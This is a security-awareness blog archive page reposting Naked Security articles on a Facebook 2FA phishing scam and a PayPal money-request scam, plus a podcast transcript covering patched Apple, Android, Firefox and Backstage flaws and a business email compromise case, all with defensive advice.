+44 (0)20 86848683

Perpetual IT

Category Archives: News

News, Phishing

How social media scammers buy time to steal your 2FA codes

by

Phishing scams that try to trick you into putting your real password into a fake site have been around for decades.

As regular Naked Security readers will know, precautions such as using a password manager and turning on two-factor authentication (2FA) can help to protect you against phishing mishaps, because:

  • Password managers associate usernames and passwords with specific web pages. This makes it hard for password managers to betray you to bogus websites by mistake, because they can’t put in anything for you automatically if they’re faced with a website they’ve never seen before. Even if the fake site is a pixel-perfect copy of the original, with a server name that’s close enough be almost indistinguishable to the human eye, the password manager won’t be fooled because it’s typically looking out for the URL, the whole URL, and nothing but the URL.
  • With 2FA turned on, your password alone is usually not enough to log in. The codes used by 2FA system typically work once only, whether they’re sent to your phone via SMS, generated by a mobile app, or computed by a secure hardware dongle or keyfob that you carry separately from your computer. Knowing (or stealing, buying or guessing) only your password is no longer enough for a cybercriminal to falsely “prove” they are you.

Unfortunately, these precautions can’t immunise you completely against phishing attacks, and cybercriminals are getting better and better at tricking innocent users into handing over both their passwords and their 2FA codes at the same time, as part of the same attack…

…at which point the crooks immediately try to use the combination of username + password + one-time code they just got hold of, in the hope of logging in quickly enough to get into your account before you realise there’s anything phishy going on.

Even worse, the crooks will often aim to create what we like to call a “soft dismount”, meaning that they create a believable visual conclusion to their phishing expedition.

This often makes it look as though the activity that you just “approved” by entering your password and 2FA code (such as contesting a complaint or cancelling an order) has completed correctly, and therefore no further action is necessary on your part.

Thus the attackers not only get into your account, but also leave you feeling unsuspicious and unlikely to follow up to see if your account really has been hijacked.

The short but winding road

Here’s a Facebook scam we received recently that tries to lead you down exactly that path, with differing levels of believability at each stage.

The scammers:

  • Pretend that your own Facebook page violates Facebook’s terms of use. The crooks warn that this could to your account being shut down. As you know, the brouhaha currently erupting on and around Twitter has turned issues such as account verification, suspension and reinstatement into noisy controversies. As a result, social media users are understandably concerned about protecting their accounts in general, whether they’re specifically concerned about Twitter or not:
    The unsolicited email “warning” that starts it all.
  • Lure you to a real page with a facebook.com URL. The account is fake, set up entirely for this particular scam campaign, but the link that shows up in the email you receive does indeed lead to facebook.com, making it less likely to attract suspicion, either from you or from your spam filter. The crooks have titled their page Intellectual Property (copyright complaints are very common these days), and have used the offical logo of Meta, the parent company of Facebook, in order to add a touch of legitimacy:
    A fraudulent user account page with an official-looking name and icon.
  • Provide you with a URL to contact Facebook to appeal against cancellation. The URL above doesn’t end in facebook.com, but it starts with text that makes it looks like a personalised link of the form facebook-help-nnnnnn, where the crooks claim that the digits nnnnnn are a unique identifier that denotes your specific case:
    The phishing site pretends to bea “personalised” page about your complaint.
  • Collect largely innocent-sounding data about your Facebook presence. There’s even an optional field for Additional info where you’re invited to argue your case. (See image above.)

Now “prove” yourself

At this point, you need to provide some proof that you are indeed the owner of the account, so the crooks then tell you to:

  • Authenticate with your password. The site you’re on has the text facebook-help-nnnnnnn in the address bar; it uses HTTPS (secure HTTP, i.e. there’s a padlock showing); and the branding makes it look similar to Facebook’s own pages:
    The crooks ask you to “prove” your ID via your password.
  • Provide the 2FA code to go with your password. The dialog here is very similar to the one used by Facebook itself, with the wording copied directly from Facebook’s own user interface. Here you can see the fake dialog (top) and the real one that would be displayed by Facebook itself (bottom):
    Then they ask for your 2FA code, just like Facebook would.
    The real 2FA dialog used by Facebook itself.
  • Wait up to five minutes in the hope that the “account block” may be removed automatically. The crooks play both ends here, by inviting you to leave well alone in order not to interrupt a possible immediate resolution, and suggesting that you should stay on hand in case further information is requested:
The crooks try to buy time with a simple 5-minute progress bar.

As you can see, the likely result for anyone who got sucked into this scam in the first place is that they’ll give the crooks a full five-minute window during which the attackers can try logging into their account and taking it over.

The JavaScript used by the criminals on their booby-trapped site even appears to contain a message that can be triggered if the victim’s password works correctly but the 2FA code they supplied doesn’t:

 The login code you entered doesn't match the one sent to your phone. Please check the number and try again.

The end of the scam is perhaps the least convincing part, but it nevertheless serves to shift you automatically off the scammy site and to land you back somewhere entirely genuine, namely Facebook’s official Help Center:

Finally, the crooks redirect you to a legitimate Facebook help page.

What to do?

Even if you aren’t a particularly serious social media user, and even if you operate under a pseudonym that doesn’t obviously and publicly link back to your real-life identity, your online accounts are valuable to cybercriminals for three main reasons:

  • Full access to your social media accounts could give the crooks access to the private aspects of your profile. Whether they sell this information on the dark web, or abuse it thesmselves, its compromise could increase your risk of identity theft.
  • The ability to post via your accounts lets the crooks peddle misinformation and fake news under your good name. You could end up kicked off the platform, locked out of your account, or in public trouble, unless and until you can show that your account was broken into.
  • Access to your chosen contacts means the crooks can aggressively target your friends and family. Your own contacts are not only much more likely to see messages that come from your account, but also more likely to take a serious look at them.

Simply put, by letting cybercriminals into your social media account, you ultimately put not just yourself but also your friends and family, and even everyone else on the platform, at risk.

What to do?

Here are three quick-fire tips:

  • TIP 1. Keep a record of the official “unlock your account” and “how to deal with intellectual property challenges” pages of the social networks you use. That way, you never need to rely on links sent via email to find your way there in future. Common tricks used by attackers include concocted copyright infringements; made-up infringements of Terms and Conditions (as in this case); bogus claims of fraudulent logins you need to review; and other fake “issues” with your account. The crooks often include some time pressure, as in the 24-hour limit claimed in this scam, as further encouragement to save time by simply clicking through.
  • TIP 2. Don’t be tricked by the fact that the “click-to-contact” links are hosted on legitimate sites. In this scam, the initial contact page is hosted by Facebook, but it’s a fraudulent account, and the phishing pages are hosted, complete with a valid HTTPS certificate, via Google, but the content that’s served up is bogus. These days, the company hosting the content is rarely the same as the individuals creating and posting it.
  • TIP 3. If in doubt, don’t give it out. Never feel pressured to take risks to complete a transaction quickly because you’re afraid of the outcome if you take time to stop, to think, and only then to connect. If you aren’t sure, ask someone you know and trust in real life for advice, so you don’t end up trusting the sender of the very message you aren’t sure you can trust. (And see TIP 1 above.)

Remember, with Black Friday and Cyber Monday coming up this weekend, you’ll probably be receiving lots of genuine offers, plenty of fraudulent ones, and any number of well-meant warnings about how to improve your cybersecurity specifically for this time of year…

…but please keep in mind that cybersecurity is something to take seriously all year round: start yesterday, do it today, and keep it up tomorrow!

News

S3 Ep109: How one leaked email password could drain your business [Audio + Transcript]

by

DON’T LET ONE LOUSY EMAIL PASSWORD SINK THE COMPANY

Microsoft’s tilt at the MP3 marketplace. Apple’s not-a-zero-day emergency. Cracking the lock on Android phones. Browser-in-the-Browser revisited. The Emmenthal cheese attack. Business Email Compromise and how to prevent it.

Click-and-drag on the soundwaves below to skip to any point. You can also listen directly on Soundcloud.

With Doug Aamoth and Paul Ducklin. Intro and outro music by Edith Mudge.

You can listen to us on Soundcloud, Apple Podcasts, Google Podcasts, Spotify, Stitcher and anywhere that good podcasts are found. Or just drop the URL of our RSS feed into your favourite podcatcher.

READ THE TRANSCRIPT

DOUG.  A not-quite zero-day, a lock screen bypass, email scams, and Emmenthal cheese.

All that, and more, on the Naked Security podcast.

[MUSICAL MODEM]

Welcome to the podcast, everybody.

I am Doug Aamoth; he is Paul Ducklin.

Paul, how do you do today?

DUCK.  I’m great, Doug.

And I don’t think you mentioned the Billionaire Gucci master.

DOUG.  He is part of “All that and more”, of course!

DUCK.  Oh, and much, MUCH more, Doug. [LAUGHS]

DOUG.  Exactly.

We do like to start the show with our This Week in Tech History segment.

This is exciting for me because I was there, man!

This week on 14 November 2006, Microsoft released the Zune, a 30 gigabyte portable media player meant to compete with Apple’s iPod.

Microsoft would make its way through three generations of Zune players, a music subscription service, and a handful of other fits and starts before canning the hardware in 2011 and the software and services in 2012.

I was working at TechCrunch at the time, and the general consensus was that not until the Zune HD, which came out in 2009, were we talking about the Good Zune.

But by then it was too little, too late, because the iPod touch came out in 2007…

…and I remember covering that event and being awed by such a device.

I can’t remember the last time I was awed by such a thin MP3 player; you could download songs directly to it.

That was the story of the Zune for me.

The hardware and the screen, though, were really good, so it was hard to not like it…

…it just was missing something, and then they shut everything down, so it didn’t really matter.

Between the Zune and Windows Phone: those were two initiatives by Microsoft I really wanted to work, and they just didn’t quite work.

DUCK.  I loved my Windows Phone, believe it or not.

It’s always the third version with Microsoft, isn’t it?

Windows 3?

DOUG.  The Zune, too – third version!

DUCK.  And I thought, “Great!”

But as soon as I fell in love with Windows Phone, they discontinued it, just when it got good. [LAUGHS]

DOUG.  Well, we can stay on the subject of Apple, because this is not quite a zero-day, but it was dangerous enough to warrant an emergency patch:

Emergency code execution patch from Apple – but not an 0-day

DUCK.  Yes, it wasn’t a zero-day because it was disclosed responsibly, as far as I know.

It was a bug in an XML parsing library called libxml2… my own Linux distro got an update that happened to include that fix.

Now, nobody else seemed to get terribly excited about the libxml2 update.

It was just, “Hey, they found a bug, they fixed it: get the new version.”

But Apple… just suddenly these updates arrived.

And they fixed the libxml2 bugs only for the very latest versions of their operating system.

So, macOS 13 Ventura and iOS/iPadOS 16.

DOUG.  So, if I’m an Apple user and I’m not running the latest version of either of these operating systems, I’m in the dark about whether I need some sort of update.

Am I waiting on an update, or is my current version, which isn’t 13.0 or 16.1… is it safe?

DUCK.  That’s the problem that we have every time this happens, isn’t it?

Where there’s an update for the latest versions and not the others.

So I wish Apple would make it clearer whether there were updates expected for other devices, or even why they felt it was necessary to push out an update just specifically for that one library.

My best guess is that when they were informed about the bug and their own security people started looking at it, they figured, “I wonder if you could exploit this… OH NO! It’s far too easy.”

Maybe they found that there was some part of Apple’s code that was just (if you like) too close to the edge of the network or the edge of the device, that might mean that somebody could quickly figure out how to exploit it.

So why not patch it?

If so, great, but it would be nice to know that!

DOUG.  So I guess the best advice we can give is to go to the software updates section and see if there’s something there.

If not, sit tight and we’ll keep an eye on it.

OK, let’s shift gears from Apple to Android.

We’ve got a SIM-swap lockscreen bypass, and this lockscreen bypass is kind of frightening in that it was an accidental discovery, so it could happen to anybody:

Dangerous SIM-swap lockscreen bypass – update Android now!

So it’s kind of serious!

And Google kind of dragged their feet a little bit fixing it…

DUCK.  Yes, Doug.

The fascinating thing about this is… I couldn’t think of a better way to describe it than a SIM-swap attack, because it involves swapping a SIM card.

But it’s not what we normally think of as a “number porting” attack where you go to a mobile phone store and you trick them, cajole them, bribe them, induce them to issue you with a brand new SIM with somebody else’s number applied to it, so you can take over their messages and read their two factor authentication codes to log into their account.

That’s one type of SIM swap.

In this case, the bug was triggered for somebody who has restarted their phone.

And in this case, because the chap had been travelling and his phone had run out of juice, he was forced to go through a full reboot.

When you go through a reboot, if you’ve got a PIN set on your SIM card (which you should have, or someone could just steal your phone, remove the SIM card, and start receiving all your calls and your texts)… well, he got the PIN wrong, and you only get three goes, then you lock yourself out.

Now you have to go and get the 10-digit PUK, which is the unlock code for the SIM itself.

You only get 10 goes at that, after which the SIM basically destroys itself and is no more use.

But he noticed that, when he put in the PUK… he realised that he was at the lockscreen, *but the wrong one*.

He was at the kind of phone lockscreen that allowed him to unlock with his fingerprint.

Not the “You’ve just rebooted your phone; you have to unlock properly with your full passcode” screen.

So he figured, “I’ve landed up in the wrong place. This shouldn’t happen. I should be locked out of my phone with more than just my fingerprint.”

And so he was able to find out that he could, if he got the SIM PIN wrong deliberately and he timed it right… he could bypass the lock code on a locked phone.

Just like that, Doug!

DOUG.  OK, so where does the SIM *swap* come in in this case?

DUCK.  Well, that’s the thing…

Imagine that you steal somebody’s phone and you realise, “Oh, dear, it’s locked.”

Now, you swap the SIM, but instead of trying to swap their *number* onto a new SIM of yours, you just go to the convenience store, buy a new SIM card, swap it into their *phone*…

…and you know the PIN on the new SIM card, so you *deliberately get it wrong three times*.

Now you’re at the PUK code entry.

You read the PUK code off the packaging, because it’s printed there… scratch it off with a coin; there’s the magic code.

You put that in, and, “Bingo!”

You’ve done his bypass!

DOUG.  If I’m a pickpocket or a criminal, or I find a phone on the ground, normally in this day and age, you think, “Oh, it’s useless because it’s locked and I’m not going to be able to get into it to wipe it and then sell it.”

In this case, you can actually do that… just buy a cheap, a free SIM; you can wipe it and sell it.

DUCK.  And, as the chap who discovered it, David Schütz, points out:

“I might be overreacting, but, I mean, not so long ago, the FBI was fighting with Apple for almost the same thing.”

I’ve got somebody else’s phone… is there a magic way, with some special hardware, that I can unlock it?

And it turns out that, with Android, if you got the timing right, yes, there *was* some special hardware, and you could go to a convenience store and buy that hardware off the shelf for $1!

DOUG.  OK, so this is serious.

So, he takes it to Google and they do what?

Do they say, “We’re going to fix it right away”… or not?

DUCK.  I think both of those: “Yeah, OK, well, someone reported this before, but we couldn’t get it to work.”

Then nothing happened, and nothing happened…

So his disclosure deadline came around, and he went to Google and said, “I’m going to disclose this, but I’m uncomfortable. What are we going to do about it?”

And, fortunately, Google then came to the party, and in the November 2022 update (he found this back in June 2022)… in the November 2022 update, they did provide the fix.

Bless his heart, he said, “Look, I’ll come to your offices and I’ll show you that it does work.”

And apparently he’s smart enough to find vulnerabilities and do bug bounty hunting for a living, it seems…

…but not smart enough to realise that when you’re in an office building and you don’t have a proper SIM ejector tool, there’s probably a paperclip somewhere around.

So instead of asking for a paperclip, he tried to use a needle, and apparently stabbed himself. [LAUGHS]

It is now fixed, but if you’ve got an Android phone, do make sure that you have the November 2022 update!

DOUG.  OK, we talked not too long ago about a Firefox “Browser-in-the-browser” attack, which I found fascinating… and it looks like we may have the potential for another one, thanks to a new fullscreen bypass:

Firefox fixes fullscreen fakery flaw – get the update now!

DUCK.  Yes!

Firefox 107 came out this week, and I think the Extended Support Release is 102.5.

(Remember, it’s “102+5 = 107”, so that’s no feature fixes, but all the security fixes.)

There’s nothing critical, there are no zero-days, but there are lots of high-severity vulnerabilities, and the one that caught my eye is a very simple and possibly trivial-sounding bug.

There’s a way to get the browser into ful screen mode without popping up that little warning that says, “Hey, guys, the browser is now in fullscreen mode, so don’t forget that everything you see *is the browser*; press Escape or F11 (or whateveritis) to get back to the regular screen.”

And you think, “How harmful is that?”

But if you remember, that Browser-in-the-Browser attack was where you paint what looks like an operating system popup dialog inside the browser window, and you trick people into putting, say, a password in there, thinking they’re communicating with Windows…

…when in fact they’re communicating with the browser:

Serious Security: Browser-in-the-browser attacks – watch out for windows that aren’t!

And I think it was one Douglas Aamoth who said to people, “Hey, just grab the window, the fake popup, if you’re suspicious, and try and move it outside the real browser window. And if it won’t go there, you know you’re looking at a fake.”

So, imagine… what’s the risk of accidental fullscreen?

Well, then you paint a fake browser window *inside which you paint a fake popup*.

And then, when the person follows your very good advice, Doug, and drags the fake popup, it *will* go outside the fake browser window and you’ll go, “OK, maybe it’s real after all.”

So the problem with fullscreen is it means that code running inside the browser (untrusted JavaScript, HTML, CSS, etc.) gets to paint effectively any pixel on the screen.

DOUG.  I was also thinking: a brilliant way to abuse this (now don’t do this, don’t try this at home!) would be to make it seem as though the user’s session had, for some reason, just logged out.

So you’re back to a “login screen”… it’s fullscreen, and it asks you to enter your password.

I mean, I have a button on my keyboard that logs me out if I hit it accidentally, and now it wants my password to get back in…

DUCK.  [LAUGHS] Doug, I’m glad you’re a colleague of mine, that’s all I’m saying, not working for the other side! [LAUGHS]

DOUG.  And if I were really enterprising (I wouldn’t really do this, of course!), I know that Windows changes the login picture every day to a different beautiful vista…

…I would just check which one is going on today, and I would cycle that every day to the newest one, once I knew what the new one was going to be.

DUCK.  Are you sure you’re not a naughty boy, Doug? [LAUGHTER]

DOUG.  So, let’s get those Firefox browsers updated, and move on to what you described as the “Emmenthal cheese” attack.

Now, if I were writing the headline… your headline was great, it was very descriptive, but you could have drawn people in with the headline just being The Emmenthal cheese attack, or why defence in depth depth is important.

Though you have “Log4Shell” in there… that’ll probably pull more people in than cheese:

Log4Shell-like code execution hole in popular Backstage dev tool

DUCK.  [MOCK AFFRONT] Are you accusing me of what I believe is called “Search Engine Optimisation”?

DOUG.  [MOCK RIGHTEOUSNESS] I would never!

DUCK.  Thank you, Doug.

It is Log4Shell-like, and I did think that people would remember Log4Shell because it’s kind of hard to forget:

Log4Shell: The Movie… a short, safe visual tour for work and home

I was worried, if I put Emmenthal cheese in the headline, that if you don’t exactly know that that is a type of cheese that generally has bubbles in it from the gas that’s generated while it ferments, and therefore when you slice it, it has circular holes in it; if you don’t know that, then… [PAUSES] I suppose I could have put a picture of a slice of Emmenthal cheese, but that would have been a bit cheesy.

DOUG.  Well Krafted!

DUCK.  Anyway,the affected tool is a thing called Backstage, and I believe it was originally developed as a developer’s toolkit for building what are called APIs, application programming interfaces.

As the name suggests, it’s more of a back-end tool, so you loosely expect it to be inside your network, but nevertheless, if it’s part of your business logic services, then you do want to make sure that they don’t have any bugs.

And I call it the Emmenthal Cheese Attack, because, fortunately, it’s not just like Log4Shell, where lots of services were exposed inadvertently and you could just send them random HTTP requests…

…and loads of them would fall into the hole of trying to process a string that contained special “secret characters” that caused them to run unauthorised commands.

In this case, it was more like having several slices of Emmenthal cheese, with all the holes in.

And if you can, as the attacker, figure out that in this network the slices are lined up so there is at least one hole next to another hole on every slice, then you can thread a string through there and get in.

The good news is, of course, that means that if you can move any one of the slices to a position where there’s *no hole that goes all the way through*, you defend against it.

DOUG.  So what are the holes that an attacker would have to thread his or her way through to hit paydirt?

DUCK.  Well, firstly they’d need to be able to access a server that had the buggy code on in the first place, to send a request.

That might be possible if you’d already broken into the network but you had limited access… say you’d compromised a developer’s computer so you could make internal API calls.

Or it might happen if you just have some services that rely on this that are visible externally.

But it’s a good reminder of some of the supply-chain complexity that comes when you use products like node.js (server side JavaScript), and the NPM Node Package Manager repository.

Because Backstage contains a thing, I think, called Scaffolder, which is a plugin that helps you arrange all your various API backends nicely.

And Scaffolder uses a logging system called (don’t shoot the messenger, Doug, I’m just reporting the name; I didn’t make it up.)… this is a Mozilla tool, I believe [LAUGHING] called Nunjucks (I don’t know where they get these names from!), and that’s a logging tool.

So like Log4J, it has magic characters like ${{ …special stuff in here that might include commands to run on the server side… }}.

And that is wrapped in a thing called vm2, which is another NPM module, another Node JavaScript module.

That one is a sandbox that’s supposed to make riskier JavaScript code a bit safer by limiting what it can do.

And, unfortunately, the company that found the problem with the whole Backstage system, Oxeye… their researchers had previously, in August 2022, found a hole that allowed them to sneak through this vm2 sandbox.

So the good news is the proof-of-concept they produced required the last slice of Emmenthal cheese *still to have the hole in that was patched back in August 2022*.

So, as suggested, the solution is to make sure that one, some or all of your Swiss cheese slices are moved so that there are no holes that go all the way through.

And that’s easy enough to do by patching Backstage, and making sure that your vm2 is patched.

Quite a few products use this vm2 sandbox – it’s meant to improve security.

So you may have vm2 even if you don’t have Backstage.

We’ve got all the full version numbers you need to go and look for in the Naked Security article, Doug.

DOUG.  OK, very good.

And last, but certainly not least, a wild story about Business Email Compromise [BEC].

DUCK.  We have reached the Billionaire Gucci Master, currently serving an 11-stretch [an 11-year prison term] in the United States of America, Doug:

“Gucci Master” business email scammer Hushpuppi gets 11 years

So he’s no longer living the high life in Dubai like he was a couple of years ago!

DOUG.  Maybe not quite a master if he’s in jail…

DUCK.  Well, if you look at the photos that were on his Instagram account, you can see that, at least for a while, he certainly wasn’t short of money.

So he wasn’t pretending to be rich, but he *was* pretending to have acquired his wealth legitimately… he claimed to be a real estate wheeler-dealer.

In fact, as you say, he was part of a so-called business email compromise/money laundering network.

And, just to reiterate, business email compromise… that term is used fairly generally these days for crimes that are predominantly orchestrated via email that pretends to be from a company, but I prefer to keep that term BEC for where the crooks not only pretend to be sending emails, say, from your CEO or your CFO, or someone senior in accounting, but they *actually have that person’s email password*.

So, when they send their fake emails, they don’t just look like they come from the real account, they actually do come from the real account.

And, as you can imagine, that’s quite a simple crime to pull off, because you can go on the dark web and buy email passwords, and you only need one for the right person.

Once you’re inside the email, you probably get, if the person is in the accounts department, a surprisingly regular and reliable newsfeed of which deals are going down, what accounts need paying, and what big accounts are about to get paid in.

And so you try and convince either the customer who’s about to pay off a debt, or you convince someone in the company itself who is about to pay out to a supplier who’s a creditor… you convince them to pay into the wrong account.

Behind the scenes, you have a whole lot of money mules and other affiliates in your cybercrime network who are out there going through the know-your-customer process with banks.

Anyway, he was busted, and apparently he pleaded guilty.

He’s been in custody for two years, I believe, awaiting trial:

Flashy Nigerian Instagram star extradited to US to face BEC charges

He finally decided to plead guilty: he faced 20 years; he got 135 months, which is just over eleven years.

So he didn’t get the maximum sentence, presumably because he pleaded guilty, and he officially admitted to two very sizable amounts that he had stolen.

One from a company in New York; that amount was close to $1,000,000.

And one from a businessman in Qatar; I believe that was also close to $1,000,000.

So he has to pay back $1.7 million to those victims as part of the whole deal.

But what was fascinating to me in this was the information that came out from the investigations that were done into this chap, who’s known as Ray Hushpuppi.

A fascinating insight into all the moving parts that are needed behind business email compromise scams, and how much effort the crooks put into staying just one step ahead of the fraud prevention mechanisms that are in place by each bank, in each country, for each type of account, for transfers between Country A and Country B, and so on…

..And thus figuring out that the “holes” in their slices of Swiss cheese that they can thread their needles through.

If you don’t mind me mixing yet another metaphor, Doug.

DOUG.  It’s enough work that you could probably go out and get a regular job, and probably make… maybe not this much money, but some decent honest money.

The amount of work you have to put in keeping track of all these banking regulations and how to move money!

“I can move it within the UK, but I can’t move it to Mexico”… all these things that he had to think about and deal with.

It’s a fascinating read, if you want to head over there and read the full report.

But we do have some advice for people as far as avoiding business email compromise, starting with: Turn on two factor authentication (2FA).

DUCK.  Indeed, Doug.

You might as well make sure that a stolen password alone, or one that was bought on the dark web, is not enough for crooks to get in.

We’ve said many times before that 2FA is not enough on its own – it doesn’t magically protect you against all sorts of attack, but it does mean that crooks who don’t know how to get hold of passwords themselves, but who go out online and buy them, can’t just instantly steam in and start scamming you.

DOUG.  And then we’ve got: Look for features in your service provider’s products that can warn you when anomalies occur.

That’s a good one.

DUCK.  Yes.

Tools such as EDR or XDR (that’s extended detection and response)… they’re not only there to help you find blunders, they’re also there to make sure that the security precautions that are supposed to be in place really are there; that they’re really doing what you think.

And so, if you’re keeping a lookout for things that might have gone wrong but you haven’t noticed yet, you are in a much better position than just waiting for a known security alert to pop up in your dashboard.

These days, that, on its own, is *necessary*, but it is no longer *sufficient*.

DOUG.  And I really like this one: Enforce a two step or more process for making significant changes to accounts or services, especially changes in details for outgoing payments.

DUCK.  It’s easy to say, “But why would any company or business person fall for that? It’s so obvious.”

But if the crooks have an in, say to the CFO or the head of accounting’s email, they know exactly the right time to mention the right contracts and the right amounts.

As always, two pairs of eyes are better than one…

And not just something where, “Oh, I have to get my manager to click the button” and it all goes through…

…for something like paying out a million pounds, you need to make it comparatively difficult.

Ideally, you need two separate teams who investigate whether the account change should go through entirely independently.

It also makes it harder for insiders to collude, of course, if there are two separate teams that are operating separately.

DOUG.  OK: If you see anything that doesn’t look right in an email demanding your attention, assume you’re being scammed.

DUCK.  Yes, we had a Naked Security commenter once (I think you mentioned it on the podcast, didn’t you, Doug?) where they said, “Hey, I spotted that a scammer was inside our network sending emails ,because they used an emoji where I was 99% certain that the sender of the email just wouldn’t have done so. [LAUGHTER] Not that they don’t know what emojis are, it’s just not their style.”

DOUG.  And that dovetails nicely with our next tip: If you want to check details with another company based on an email, never rely on contact data provided in the email, especially when money is involved.

DUCK.  Yes, I think you covered that elegantly last week, Doug, didn’t you, by saying, “You know, when there’s a phone number in the email, don’t phone it up and say, ‘Hi. Is that Twitter?’ Always find your own way there.”

DOUG.  And then last, but certainly not least: Consider using internal training tools to teach your staff about scams.

DUCK.  Unsurprisingly, Sophos has just such a tool… we’re not giving that tip because we want to sound like salespeople, but Sophos Phish Threat, that’s our tool to help you:

If you don’t put your employees to the test, where they can fail the test and then you can use that as an opportunity to teach them how to do better next time…

…if you don’t test them, the crooks are jolly well going to do it for you, and they’re going to try it day after day after day, and they’re not just going to try one person at a time.

Anything you can do to raise your company’s collective resilience has got to be a good thing.

Just make sure that when you do things like phishing tests that you handle the cases of people who fail those tests with great sympathy.

DOUG.  OK, great advice!

And as the sun begins to set on our show for today, we do have our reader comment, and it’s on this story over on Twitter.

@Snowshoedan comments on the Business Email Compromise story:

“it’s ironic that a dude who literally made a living off of other small mistakes made some huge ones. Don’t brag about your lifestyle on the socials if you did it illegally.”

DUCK.  Hushpuppi certainly had millions of followers, and I guess he revelled in that, so he certainly went out of his way to draw attention to himself.

I imagine that he might very well have been caught anyway.

Though the pictures that you see in the Naked Security article came from his Instagram account via the Department of Justice charge sheet to get a warrant for his arrest.

So they used it as part of their own evidence to convince the Magistrate Judge, “This guy is not just making dimes and nickels.”

DOUG.  Excellent.

DUCK.  “That’s definitely a Roller [Rolls Royce car], and that’s definitely a Bentley.”

DOUG.  All right, thank you for sending that in @Snowshoedan.

If you have an interesting story, comment or question you’d like to submit, we’d love to read it on the podcast.

You can email tips@sophos.com, you can comment on any one of our articles, or you can hit us up on social: @NakedSecurity.

That’s our show for today, thanks very much for listening.

For Paul Ducklin, I’m Doug Aamoth, reminding you, until next time to…

BOTH.  Stay secure

News

Black Friday and retail season – watch out for PayPal “money request” scams

by

Given that we’re getting into peak retail season, you’ll find cybersecurity warnings with a “Black Friday” theme all over the internet…

…including, of course, right here on Naked Security!

As regular readers will know, however, we’re not terribly keen on online tips that are specific to Black Friday, because cybersecurity matters 365-and-a-quarter days a year.

Don’t take cybersecurity seriously only when it’s Thanksgiving, Hannukah, Kwanzaa, Christmas or any other gift-giving holiday, or only for the New Year Sales, the Spring Sales, the Summer sales or any other seasonal discount opportunity.

As we said when retail season kicked off earlier this month in many parts of the world:

The best reason for improving your cybersecurity in the leadup to Black Friday is that it means you will be improving your cybersecurity for the rest of the year, and will encourage you to keep on improving through 2023 and beyond.

Having said that, this article is about a PayPal-branded scam that was reported to us earlier this week by a regular reader who thought it would be worth warning others about, especially for those with PayPal accounts who may be more inclined to use them at this time of year than any other.

The good thing about this scam is that you should spot it for what it is: made-up nonsense.

The bad thing about this scam is that it’s astonishingly easy for criminals to set up, and it carefully avoids sending spoofed emails or tricking you to visit bogus websites, because the crooks use a PayPal service to generate their initial contact via official PayPal servers.

Here goes.

Spoofing explained

A spoofed email is one that insists it’s from a well-known company or domain, typically by putting a believable email address in the From: line, and by including logos, taglines or other contact details copied from the brand it’s trying to impersonate.

Remember that the name and email address shown in an email next to the word From are actually just part of the message itself, so the sender can put almost anything they like in there, regardless of where they really sent the message from.

A spoofed website is one that copies the look and feel of the real thing, often simply by ripping off the exact web content and images from the original site to make it look as pixel-perfect as possible.

Scam sites may also try to make the domain name that you see in the address bar look at least vaguely realistic, for example by putting the spoofed brand at the left-hand end of the web address, so that you might see something like paypal.com.bogus.example, in the hope that you won’t check the right-hand end of the name, which actually determines who owns the site.

Other scammers try to acquire lookalike names, for example by replacing W (one W-for-Whisky character) with VV (two V-for Victor characters), or by using I (writing an upper case I-for-India character) in place of l (a lower case L-for-Lima).

But spoofing tricks of this sort can often be spotted fairly easily, for example by:

  • Learning how to examine the so-called headers of an email message, which shows which server a message actually came from, rather than the server that the sender claimed they sent it from.
  • Setting up an email filter that automatically scans for scamminess in both the headers and the body of every email message that anyone tries to send you.
  • Browsing via a network or endpoint firewall that blocks outbound web requests to fake sites and discards inbound web replies that include risky content.
  • Using a password manager that ties usernames and passwords to specific websites, and thus can’t be fooled by fake content or lookalike names.

Email scammers therefore often go out of their way to ensure that their first contact with potential victims involves messages that really do come from genuine sites or online services, and that link to servers that really are run by those same legitimate sites…

…as long as the scammers can come up with some way of maintaining contact after that initial message, in order to keep the scam going.

Romance scammers, who try to lure victims into fake online relationships in order to sweet-talk them out of money, know this trick only too well. They typically start by making contact in a conventional way on a genuine dating site, using someone else’s photos and online identity. There, they charm their victims into leaving the comparative safety of the legitimate site and switching to an unsupervised one-to-one instant messaging service.

The “money request” scam

Here’s how the PayPal “money request” scam works:

  • The scammer creates a PayPal account and uses PayPal’s “money request” service to send you an official PayPal email asking you to send them some funds. Friends can use this service as an informal but relatively safe way of splitting expenses after a night out, asking for help paying a bill, or even to get paid for small tasks such as cleaning, gardening, pet sitting, and so on.
  • The scammer makes the request look like an existing charge for a genuine product or service, though not one you actually ordered, and probably for what looks like an unlikely or unreasonable price.
  • The scammer adds a contact phone number into the message, apparently offering an easy way to cancel the payment request if you think it’s scam.

So the email actually does originate from PayPal, giving it an air of authenticity, et entices you to react by phoning the crooks back, rather than by replying to the email itself.

Like this:

In this example, the product you’re supposed to have purchased is the name of a genuine consumer anti-virus program, with the number 365 tacked on the end to give it the look of an online-only cloud-based product.

Given that you are quite well aware that the payment request was never authorised by you, you may well report it to PayPal…

…but it’s also tempting to phone the “business” that put through the request to tell them not to hit you up again next week or next month when their “records” show that the “bill” still hasn’t been paid.

After all, the phone call’s free (in the UK, as in many other countries, the -800- dialling code denotes a toll-free call), and if someone you know really has tried to buy some online cybersecurity software and charge it to your dime, why not try to get to the bottom of it and stop the “payment” getting through?

Of course, it’s all a pack of lies: there’s no anti-virus program; there was no purchase; and no one actually paid out £550 to anyone for anything.

The crooks have simply found a way to abuse PayPal’s free Money Request service to generate emails that really do come from PayPal, that include real PayPal links, and that use the message field in the request to give you an official-looking way to contact them directly…

…just like a romance scammer schmoozing you at arm’s length on a dating site, and then convincing you to switch over to messaging them directly, where the dating platform can no longer supervise or regulate your interactions.

What to do?

The quickest and easiest thing to do, of course, is nothing!

PayPal money requests are exactly what they say: a way for friends, family, someone, anyone, to invite you to send them money in a reasonably secure way.

They aren’t invoices; they aren’t payment demands; they’re not receipts; and they are unrelated to any existing purchase you did or didn’t make via PayPal or anywhere else.

If simply you do nothing, then nothing gets paid out and no one receives anything, so the scam fails.

We nevertheless recommend that you report bogus requests of this sort to PayPal, which will help to get the offending account closed down and to ensure that no one else either pays up through fear or calls the given phone number “just in case”.

Whatever you do, don’t send any money, and definitely don’t call the criminals back, because their true goal is to establish direct contact so they can start working you over to you to trick you into revealing personal information that could ultimately cost you a lot more than £549.67.

Shoild you tell the authorities?

Whether it’s during Black Friday season or at any other time of the year, we urge you to consider reporting scams of this sort to the relevant regulator or investigatory body in your country.

It might not feel as though you’re doing much to help, and you probably don’t have the time to report each and every one, but if sufficiently many people do provide some evidence to the authorities, there is a least a chance that they will do something about it.

